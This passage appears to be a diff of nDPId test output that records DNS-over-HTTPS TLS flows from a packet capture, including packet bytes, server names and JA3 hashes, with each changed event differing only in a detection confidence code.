Rm3PXbeYNOWUADrJWXjguUacdKmikyCoiD9vRp7ll6YxsV5jSfRT\/9SmZeNE+aTDy2wakB7qY1oeeLE4kVchDyQa22zUAtVHOgOvTZInJYA\/takDFgegJnQaYWISVIejbCOHLLvY\/LGAj1CyqRrh1\/LJm06TJxFQn5cMNb5SSEJFNyxF75PSPT288zWx2Va0aIhDIB+vku9QlaiV4ac8CwDTFNaqbQKECa5ibv22eB002L0jyDWacUoUluFvwofh+CTE377hEPfvjsRjX+V3P\/erPya8F4fW7JQkFJgCrTK1VaoDF64ZvLzNQJ5aCIC3Js6D+sD6g4jOpLHGy2zHMlk9wTN+yBybuSBsrJL9uS5j3JgQRC167kARpn8\/3wkN3\/lvlFPoVYVhj99l\/NeW6y\/YdomeNnyw0D7qas3wz1t0EQFticUf9LLfRMzRHEf20AYOoy9Fonct0XWUb6fLDU7CQJTqCHU8Eiy+rgD2t\/dxE4NlpfZ2ZSbDZ7QWFdftipHKlR4nJqLL0sU6kjZ8SydsZ8oAinHCIV9v5PNYgUBa8WbGYb2kgxJMSN3jbYzsoGwAsbdeAghc0S7LurZvISJXwa0jBqUzUHZmweZXCdDnfDiPc92KCXG9hA13VfXTouQnTd0zyBwPxIcvLGDhAu1CCSmBlGZrOEjmOi1\/i4ug\/A=="} 
-00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":326,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739378577,"flow_last_seen":946739378607,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":2503,"flow_tot_l4_payload_len":2786,"flow_avg_l4_payload_len":1393,"midstream":1,"thread_ts_msec":946739378607,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"jp.tiarap.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":326,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739378577,"flow_last_seen":946739378607,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":2503,"flow_tot_l4_payload_len":2786,"flow_avg_l4_payload_len":1393,"midstream":1,"thread_ts_msec":946739378607,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"jp.tiarap.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":946739378610,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739378610,"pkt":"REREREREZmZmZmZmCABFAABoLytAAH4GiGoKAAABaBwcIoO8AbvZKqYtoyMiIFAYAfVFVQAAFAMDAAEBFwMDADUQNuPt6m2nY9MgXiEHZRB5L+gDtuMOMxUUfy82Uox32sOXoFpXHp3NUSfU3Rmr6gABtUijkQ=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380697,"flow_last_seen":946739380697,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739380697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00851{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":946739380697,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739380697,"pkt":"REREREREZmZmZmZmCABFAAFIsgNAAH4Gh+8KAAABAQAAAdIqAbvH6z5LSWNp6VAYAfbC9wAAFgMBARsBAAEXAwNccnLckexdP3Wz7tsKiknbwUElui2FZGSKODu9LnFkjSDCKDL2dIORj+O\/DGu\/+ddISHKLc0yxsHWSEQ0iee1a7AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zLmNsb3VkZmxhcmUuY29tAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIM\/CjtFE6\/BfV0qVOcMMUIig11i56\/tpHaQ1FlARye8w"} 
-00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380697,"flow_last_seen":946739380697,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739380697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.cloudflare.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380697,"flow_last_seen":946739380697,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739380697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.cloudflare.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
04322{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":946739380725,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2892,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2892,"pkt_l4_len":2858,"thread_ts_msec":946739380725,"pkt":"ZmZmZmZmRERERERECABFAAs+VjZAADoGHccBAAABCgAAAQG70ipJY2npx+s\/a1AYAELM7QAAFgMDAHoCAAB2AwNqFtv3xWSYHbL\/TEVcxTgtPyY5syhT1Ar0J7GcYm2olyDCKDL2dIORj+O\/DGu\/+ddISHKLc0yxsHWSEQ0iee1a7BMBAAAuADMAJAAdACABwPRBPqMH6tP2UgTdU38yy4IBdMrNy3Y26n6nkJgoEgArAAIDBBQDAwABARcDAwqMAOf8HgLdG4eR2zQrlVcXNJK6gSgekjnntDDuH\/5mItzTS2PjuRorCZtp1e456Yzxd\/c9Pjo0KqOApsf0Oet3HLAxOPX\/4mq0oqPJv6\/pWYh6XkL49x7kn3sA8FLizWIik5oy6pRjSBWFf6tqxUO+Djt17wQK6yhMls9hUq1ClHJUh6Qn273NZpiWOuHCd9wGeCfeInHvS8qk0EqIdne\/5O3+AKgM\/cALapdKbBhIoAyrPwqC2hLjGuasAzda3QO\/+ESHum\/F9d6o\/5K+8IYpY8o8qtVJ6Drg8futbzGhAS87lZYW5UeuuFH05CzhM6cODq7gNj4mbPjTJ5ApTRpwsXEw0cwu6tAiKdHBHu4s131JOS1nhPpDpOs1W8FqhOijP5pChk7nVfwQ9Bu1xYiYmTlZWYP4bC0IhVSltsY4+ffd9etk6QNu1u5Seoh1QaWRe4DU8GYPqDdj9ywHuBnTu\/kdk6yObRcYizbhLyG5JiQSyxA9bv7iPMzOSI\/oPD6Rw4c6cy1qJywZ7F9o\/W7KUU6pYYhqWRcunfBOy2cedxZtVaWxcAQGD7VjEr1GjI\/ndJEL6DV\/vUO5PSsHgdX\/GScVrZdS\/KHwHxAHOv1BpKxNHl+ElIeVfCJc4tBsNkoBf5+COT0BV1cqDq\/0TqIcpVxlMv3\/7JDTZZTI\/wMxcbTZkEC580\/OL4P7o7ZBv1lVciiiGUxirK0Wn0VmKVkOPUH1VVDEVtxbspQjAQAudOqLnKMivdYYnLWKcLFjjfuE8XwFn1JkF2YyGgtdu+0wxe7V3QdQyeX6wSKDfGOBn1RHTiZSQJLrjf\/MjK6PK6+6dmcX2K\/Nos\/HKCWzOCSGOxH6pgvl94s\/0dDawx7iAmW0aKHP7fN\/Qsuj7qBRlYmeX3wDSe3ACAyO8PJtifBKRUnx+i44zF\/TEZT9\/0f9hj1yXYZhM4IttxvCtS3N7k187lM2JB6HB4DmePSpA5UfxEPRq71lNWUsDLAAiN3ekJSKoZ7PUpp\/6SJsuSwyITjf4EqBLpeWL9MrWeNXoUk5W1F7hWZmXxUwbc9PMEuirTVJUIeKJcMT3hUo1x6K9jQ+3H\/3FjLuAvSaGN20\/JlmWzUhH2c19MbTsBdNUca8p5h9ftAYWxNZFi+BPME56GacRIjusosOaDm6TM6NIeJtcd5nQ0Y6NbfwEe7MdB0akdNH1SZ5FpPCUXE+5h9eWmGzxT6gCZx6qvA46+kjmSPa8Cj85dDYPgUItxPMDzQDmcDkFl4Jtoqp7CsVbgDs2FaRSNSCg+ZMEThJQx0\/Aqz+vGM8Axcf5cpBgdqJ
qmkgft7WVM6LgxM0bWa6ReLOTbftdrjvt51qS7oW8iSFCaAMyVHnB9nNub1rCB71JGnHgmpLaDriPHmvZHyXG+tF3YYxqKFpVLMzSELDqif9S44Mrb9ZjnIWKvGQryM\/QSKoEg5X7zctl4vxNBFap6BlJhqRr3fm7FAc37N2CcUPqfx3Q8d+odOusP4Ls3Xq2Sur1UmBSNW9zqMAV9eCaagN4swiO+HX9D1JhZPxXTW9QWyDXi2zI1HI7LUB70fqeJS7u5T5BooNTQeoNzZVCvWOXWLt+ZiIbxI46okrDHFQXi\/x2G\/UqXdfkOEinNyh78FxOnrKcOtvfU1vQdaz7Z3d1S6XTGxIbp7Avs8yqCBkfYYx0okhQoRYkFViIAKhs8EJ22ENemkpy\/xMNRrY7HXIqAF0plC7ASy6aRPBxNQLpe6Ed5IaeUHDV+pWuEiLAgXAO3BIyMmN+dKwyJRSjGew81SAxYCXzqNGK2p7GdpO\/XP0maghqEG1aIROtTBX2ArldnERnpk4NXjDbfgsSkzP20ClfXeN4yjZTmAjINRHsDFyBG2kVPsbWM6bJ6sXUqNBkjHzH8mUguB01CThNReqO2rGsLiKr5qTMAwxKxjfEdoEJ+OdtfVMDr3B0PaBDiW6NDXICwJTMjrTiHsqLMySrS2T3BXPc1yBL+jDROuKYyhTZQzCA6ktzSKC6wAMC\/2RMbHnV4JUqSuJoXnZI1jiGQfafDh9qm0ZR91\/Upntxs\/kWZ9Zofn9x4gsvGL94XY2stn+kYJ+lpR5T38ZBRBOsXu8bAGsKAP+3wt7PlEML8VYdMSv1Y8XhaZ4vQZT4mxjokM8a+\/vbBm5OFXEOAsw3UpeMp5Pdlywdfks9xANyyHcs7XyT+4nzRjV93W+RbJVksh761\/0CsogB0Bf4AeRq1b8bSy2mVWD\/C9oBFlc4PSw+jhx1uKdorr8amCiJ2bwSUXaBBKYKGtf3eKS0Vrr8DWhAzmAupA8TRMiBwDgWH\/pSpuuBxo4fKT36lTdVMpKIp966xzVRYeAdyJ8dQTy5jeDQL1o\/K9FAvaIxIHdqy3Ai9UpxdTmYwoZXk1RGWSFQPWK2eEqydFLHkwLiG2A9OQ8pCYrZlqHUn1snev7fQAbwrXFOXDJskS+CYp+0GQvu\/Fu37N\/vYvDe9yQ2BjQyb\/Aq\/mNLHkdVzTu+oIIX6og2jNse2SlImfdMuiBssQFePUieOP3nrkgegmZDkJvZU8\/IJtyIPGhvEr4wy0KRjmbk1R5TV1oh+Gvyump800hgoeZ6yINLishVXjkSrZbw30TzgVyIHMXbfVH5cMb\/otpjX8v74ViZ68NiQoVQGCiu9Qccb9jITaHI7YqId83HAhD0Mgcvql8x4riVhsLhWBp7KARZMNylg6FCWQzYhkomLcDqOeaHr\/i3Kucv0p5GzUzkUvhbOyyBarVy1r5EY3Ff\/LeERfwiWeu9JMjSlW9a76FWzNvpbjiVQvAXjpJS+B6vW0S676\/2F\/QVlBvmv\/1e3jfE46NEORC\/KvStAu1+NCVXXkgYYjYaavSuMFqEVMBLpNt3pqmD175kYHYjG6R6TDv0nmjRk\/fdkSOg4ydMi2g43e05SDICPCTBrKL+H8pdmtKEp3WxofXZCtNR+ckTvaTdfJXZMWJbImpAgp0edudixTNqo9z3f5BRBQ1U170EzzThEQIMmS6RHUG4MBWpfatZDm+5s5WqxzAc+f48z+5\/Rjpm1MjT7FAj2QOS2mS1pZuw8jR7f9mlmDHlYUa7yULFKz+EOcDFjny+TGuKCw6tBmvp0uAgOgbWkR3PGwLQlgJNN5qcasz\/DdlRFFRc1kdK872NuK41RPGMSa34kfvjKckPj3jn4ntsF1i9WcRtXZaTKddZmAVoibh8F7o+\/2BqWfWHshjLjbv2UXOWt85MGeIvvR+JAZ4lQKxhMp4ApqHsqTnv9vjAIsk+AJwp0L
3kf96BrAf5lxFwLByeiu2ScazZunSG5IvLxJ2cCZzgYOFm\/xSZPCmFYvKNJw727A0qH0cpDBKVk4Z5vvRen3ROFERblATF0imHD72RVGcQ\/rMrcnTAneuS+605QxQwV5cyssndlHujOT5cJjQwi4Me+A9i\/U+gGMItbvzyiV\/bH\/dnSH\/6+REX1pIGyZTP+9n2MXLAZnibrKAMIRfK2TIfrOe5jmJF94vcBm\/\/5ycPeTZII89RYTOm\/OYD7dCL\/Fj+p2ZF9GMMq1KmH\/crTCIqHICoTep9ezhaM3lurJnltFyZNv3oliEoTfl"} -00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":343,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739380697,"flow_last_seen":946739380725,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2838,"flow_tot_l4_payload_len":3126,"flow_avg_l4_payload_len":1563,"midstream":1,"thread_ts_msec":946739380725,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.cloudflare.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":343,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739380697,"flow_last_seen":946739380725,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2838,"flow_tot_l4_payload_len":3126,"flow_avg_l4_payload_len":1563,"midstream":1,"thread_ts_msec":946739380725,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"dns.cloudflare.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":946739380727,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739380727,"pkt":"REREREREZmZmZmZmCABFAABosgVAAH4GiM0KAAABAQAAAdIqAbvH6z9rSWN0\/1AYAfXCFwAAFAMDAAEBFwMDADVke5XeBLKUZMMwsdywo3cwWM6dcwvPxEIBrrKuQwAVECVGBCt8L\/1vmMSczXlzhvKSsbEzJA=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380870,"flow_last_seen":946739380870,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739380870,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":946739380870,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":946739380870,"pkt":"REREREREZmZmZmZmCABFAAFEC7lAAH4G5eQKAAABLVocAII6AbvzwYfFjc3Z3lAYAfYLTQAAFgMBARcBAAETAwME0sG+tMqbxpRl1DV8Z2dnX5LfzpIiHTt74xC1bVbZqCBq5Am0FD9Ax\/Z0hd9jpGF+x36pK3fx2LqXRJeDdYghvgAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACkAAAAEwARAAAOZG5zLm5leHRkbnMuaW8ABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAghy6XniNnPGDj9u0r7tzchu6tmfTKqCDkZge3YRdGMjI="} -00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380870,"flow_last_seen":946739380870,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739380870,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.nextdns.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380870,"flow_last_seen":946739380870,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739380870,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.nextdns.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 02432{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":946739380903,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739380903,"pkt":"ZmZmZmZmRERERERECABFAAXUAxlAADQGM\/UtWhwACgAAAQG7gjqNzdne88GI4VAQAnmV4AAAFgMDAHoCAAB2AwNSUVDmrRSBFJr3VlpPTiOBfna69z7Ip3AgaZ4JY8XZPCBq5Am0FD9Ax\/Z0hd9jpGF+x36pK3fx2LqXRJeDdYghvhMBAAAuACsAAgMEADMAJAAdACBgLhCqxZDxBYT0wty93r8WAtFFYd34UV+f0SYd9yF0RxQDAwABARcDAwAgNdJG6I7V9ce0uN\/W8MyCm58pWjfsCFZXXJnMcWaU4P8XAwMJ4l4xzn1tklFeMfXUSkilkOHkR2CrV0Fk61C4hUjayiVX3XCUzF\/nVmk3NsjsUuGQs+ELPFl7aLMJpdeipyb\/BRKM7DDOdlmSjSZFpz3sI+4Ap1vb842GKpbBCp1KIgOgnmXfMMwnL4uKzNN2+XpL8V9LwuMNROahwk9tJrSx3BZQnvVy5qktKVugzkoTSb9fPpFovSjkUbQUBQuFWl2cxLyQBO6gjWiaDBpgoqREkqW2UGurTHpBXCvX7xTK+SGfs3VLNGPL\/jM509wXezmGXrBZolGpSBcCmwqP5AGjSUkJQ2KFF8\/5I5DLe1rWw\/7rCzdCJgW7dwItPpQigYvEpUhaTQyjzhLtXm4Br1gtr+Iuf0HPHYTCtm1Z9061ijlO7A
esYAg3NSX4lpTeBeQNzqwAGQi0kxU+8BsfAI4uhNY4fwD\/tgZRm00kCDUGr0Hw1O0\/9wcQo2OrT4hVI8sBPv9rovACUd1xTXQBUu4c2UNVQr\/DAwgtr3oGHXN\/yf6hHksHqaO6ThyUELGPZgyTaAEJeYSlV\/UuFXosuXrXk+4M4bQmtm8xQA\/hPEgZw03CxD+XIQ9CziCJc2Lx3r4h2FdBiMwzohldpvHSBUXM2GuHl07Muv9yz1FfyzqYAimU2llIffa6XcR6\/N9ex4PCYrVYeRifJmT\/hN608lQ56Pm4ckRgIW72lS0ILwL91eG\/PWLw1TWr9OHqib8dqID1N28WvnDQAc1WG+OfvFA5Lx7KtiZ9\/3KI7f7RCYG\/5anpOjN3Yvo+yrHT\/\/9yxTpA2EDhXmw1I+drMKCfdVXEwoRqrQDXQ3qu16NE+piWO4zYtxH6MrZOf5GKUoqj85zhZkJ6n3Wtdfmw0p2w7uWnPZarz2kRT1hGv0H7uWAwQsIO2witiCTCAX0VhCKqX5eg9HlVQxEJ8e6aZG6udk28L+hlu2DjHm2cK3LT5siYCZ+61rOCmuWYzAzB4PZwDYNVRnV0GsHgMCnZc9N4\/ighhHZqiYL81av1zekzo7Qcc39eQmJB1\/vhuqI4+c3vKnv7ROdK1hsAX7hP\/VFs8H8ZF9FxFv36aFuAu1HQxIxhZTCwXDQcu5TzVx1PL5uguNjR7pwef7T5COi4aTCL27yji1k+uS4xQgf7uM7lfjr7UlwSz76e6z\/NdrgDABxN2pYomW51+xON8iXDOy0cXgxInpylLI6lmV7hJWGh+rssjjMTkzOSia\/tb6HN8MDXz8ND7qC4wdRBL+K2XXzk7CxXSZKHbU7oBKE3VuTcSRmBvFAj4jzbuAW9nVI5Yw9M7KxJ0oNCiAer+7rkuV1\/dCwQt\/7\/zkSRGAemKSurrkjoqozLCUcuNRu2YlaJLAc\/PeEJmeHXWSos8ReOKG9libwm6aBbFjBhBGqk11oBFxYMJe3fE8zx0cKng5v141kUW5K8KykDBQPlm38itlnDfJBFaB9Jn9F1Dk+fc1GMvxAKNX1KD189yDAOfdy35szVs+4vU19xgaD3Asb+3zoIgGeHaF3v5zAsODf1V7zFmYGD1A5VyodE+SZcg8yBGqWdCjN6Dq7+yW5n4whEBATh9+W8PK0m19STC9EnY\/KFQ8CMbZglLaqGH9UHLlwuaNZUfgFyrj24dAMianUUp6I5pp2CbweoDVXgQfGbkHcfYC\/73I2CAYRQxi4XFXP\/UJ7vD4Iv633KLKMEpQYwdikhrjOP"} -00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":359,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739380870,"flow_last_seen":946739380903,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1736,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739380903,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.nextdns.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":359,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739380870,"flow_last_seen":946739380903,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1736,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739380903,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.nextdns.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
